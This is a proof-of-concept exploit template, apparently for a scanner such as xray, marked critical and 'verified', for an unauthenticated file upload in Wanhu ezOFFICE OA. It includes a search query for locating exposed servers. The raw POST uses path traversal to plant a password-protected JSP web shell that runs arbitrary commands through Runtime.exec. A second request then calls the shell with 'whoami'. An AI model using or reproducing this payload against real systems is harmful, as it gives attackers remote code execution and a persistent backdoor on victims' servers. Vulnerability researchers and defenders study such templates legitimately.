漏洞描述
141是控制从什么地方读取,300是控制读取内容的长度
app="万户网络-ezOFFICE" && port="7001"
wanhu-oa-attachmentserver-upload-file: 万户 OA 前台无条件 GETSHELL
PoC代码[已公开]
id: wanhu-oa-attachmentserver-upload-file
info:
name: 万户 OA 前台无条件 GETSHELL
author: d4m1ts
severity: critical
verified: true
description: |
141是控制从什么地方读取,300是控制读取内容的长度
app="万户网络-ezOFFICE" && port="7001"
reference:
- https://rce.ink/index/view/318.go
set:
hostname: request.url.host
rules:
r0:
request:
raw: |
POST /defaultroot/public/iWebOfficeSign/attachmentServer.jsp HTTP/1.1
Host: {{hostname}}
Content-Type: application/x-www-form-urlencoded
DBSTEP V3.0 141 0 300 DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
RECORDID=
isDoc=dHJ1ZQ==
moduleType=Z292ZG9jdW1lbnQ=
FILETYPE={{base64("../../upload/html/osias.jsp")}}
ABCCBANNNNN<% if("osias".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>
expression: true
r1:
request:
method: GET
path: /defaultroot/upload/html/osias.jsp?pwd=osias&i=whoami
expression: response.status == 200 && response.body.bcontains(b'ABCCBANNNNN') && response.body.bcontains(b'<pre>')
expression: r0() && r1()